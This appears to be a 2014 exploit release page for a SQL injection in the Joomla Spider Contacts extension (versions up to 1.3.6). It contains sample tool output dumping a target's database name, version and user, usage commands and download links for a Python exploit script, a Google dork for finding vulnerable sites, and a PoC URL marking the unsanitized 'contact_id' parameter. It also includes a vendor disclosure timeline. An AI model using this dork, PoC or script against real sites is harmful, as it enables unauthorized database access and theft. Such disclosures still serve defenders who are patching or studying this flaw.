Joomla Spider Contacts 1.3.6 and below SQL Injection vulnerability

Joomla Spider Contacts

   $$$$$\                                   $$\                  $$$$$$\            $$\       $$\
   \__$$ |                                  $$ |                $$  __$$\           \__|      $$ |
      $$ | $$$$$$\   $$$$$$\  $$$$$$\$$$$\  $$ | $$$$$$\        $$ /  \__| $$$$$$\  $$\  $$$$$$$ | $$$$$$\   $$$$$$\
      $$ |$$  __$$\ $$  __$$\ $$  _$$  _$$\ $$ | \____$$\       \$$$$$$\  $$  __$$\ $$ |$$  __$$ |$$  __$$\ $$  __$$\
$$\   $$ |$$ /  $$ |$$ /  $$ |$$ / $$ / $$ |$$ | $$$$$$$ |       \____$$\ $$ /  $$ |$$ |$$ /  $$ |$$$$$$$$ |$$ |  \__|
$$ |  $$ |$$ |  $$ |$$ |  $$ |$$ | $$ | $$ |$$ |$$  __$$ |      $$\   $$ |$$ |  $$ |$$ |$$ |  $$ |$$   ____|$$ |
\$$$$$$  |\$$$$$$  |\$$$$$$  |$$ | $$ | $$ |$$ |\$$$$$$$ |      \$$$$$$  |$$$$$$$  |$$ |\$$$$$$$ |\$$$$$$$\ $$ |
 \______/  \______/  \______/ \__| \__| \__|\__| \_______|       \______/ $$  ____/ \__| \_______| \_______|\__|
                                                                          $$ |
                                                                          $$ |
                                                                          \__|
 $$$$$$\                       $$\                           $$\                       $$\       $$$$$$\      $$$$$$\
$$  __$$\                      $$ |                          $$ |                    $$$$ |     $$ ___$$\    $$  __$$\
$$ /  \__| $$$$$$\  $$$$$$$\ $$$$$$\    $$$$$$\   $$$$$$$\ $$$$$$\    $$$$$$$\       \_$$ |     \_/   $$ |   $$ /  \__|
$$ |      $$  __$$\ $$  __$$\_$$  _|   \____$$\ $$  _____|\_$$  _|  $$  _____|        $$ |       $$$$$ /    $$$$$$$\
$$ |      $$ /  $$ |$$ |  $$ | $$ |     $$$$$$$ |$$ /        $$ |    \$$$$$$\          $$ |       \___$$\    $$  __$$\
$$ |  $$\ $$ |  $$ |$$ |  $$ | $$ |$$\ $$  __$$ |$$ |        $$ |$$\  \____$$\         $$ |     $$\   $$ |   $$ /  $$ |
\$$$$$$  |\$$$$$$  |$$ |  $$ | \$$$$  |\$$$$$$$ |\$$$$$$$\   \$$$$  |$$$$$$$  |      $$$$$$\ $$\$$$$$$  |$$\ $$$$$$  |
 \______/  \______/ \__|  \__|  \____/  \_______| \_______|   \____/ \_______/       \______|\__|\______/ \__|\______/

                                                                                         j00ml4 Spid3r C0nt4cts <= 1.3.6 SQLi

                                                     Written by:

                                                   Claudio Viviani

                                                http://www.homelab.it

                                                   info@homelab.it
                                               homelabit@protonmail.ch

                                          https://www.facebook.com/homelabit
                                            https://twitter.com/homelabit
                                         https://plus.google.com/+HomelabIt1/
                               https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww


[+] Searching for Joomla Spider Contacts vulnerability...
[+]
[!] Boolean SQL injection vulnerability FOUND!
[+]
[+] Detection version in progress....
[+]
[+] EXTENSION VERSION: 1.3.6
[+]
[!] http://10.0.0.67 VULNERABLE!!!
[+]
[!] DB NAME : joomla
[!] DB VERS : 5.0.95
[!] DB USER : pippo@localhost

Exploit Usage

1) Joomla standard path:   http://localhost/index.php?option=com_spidercontacts
                           [user@localhost ~]$ python j00ml4_spider_contacts_136_sqli.py -H http://localhost

2) Joomla Custom path:     http://localhost/joomla/index.php?option=com_spidercontacts
                           [user@localhost ~]$ python j00ml4_spider_contacts_136_sqli.py -H http://localhost -b joomla

Download

Download: j00ml4_spider_contacts_136_sqli.py
          j00ml4_spider_contacts_136_sqli.py (Mega mirror)

Info

######################

# Exploit Title : Joomla Spider Contacts <= 1.3.6 SQL Injection

# Exploit Author : Claudio Viviani

# Vendor Homepage : http://web-dorado.com/

# Software Link : http://web-dorado.com/?option=com_wdsubscriptions&view=dwnldfree&format=row&id=60
#   Mirror Link : https://mega.co.nz/#!mJwlUahJ!fx7d1ZQszaD3-k66PjWQEBXQafJnEeRDEleN8jqbVOE

# Dork Google: inurl:option=com_spidercontacts

# Date : 2014-09-07

# Tested on : Windows 7 / Mozilla Firefox
#             Linux / Mozilla Firefox

######################

# PoC Exploit:

http://localhost/index.php?option=com_spidercontacts&contact_id=[SQLi]&view=showcontact&lang=ca

"contact_id" variable is not sanitized.

######################

# Vulnerability Disclosure Timeline:

2014-09-07:  Discovered vulnerability
2014-09-09:  Vendor Notification
2014-09-10:  Vendor Response/Feedback
2014-09-10:  Vendor Fix/Patch
2014-09-10:  Public Disclosure
 
#####################

Discovered By : Claudio Viviani
                http://www.homelab.it
        
                info@homelab.it
                homelabit@protonmail.ch

                https://www.facebook.com/homelabit
                https://twitter.com/homelabit
                https://plus.google.com/+HomelabIt1/
                https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww

#####################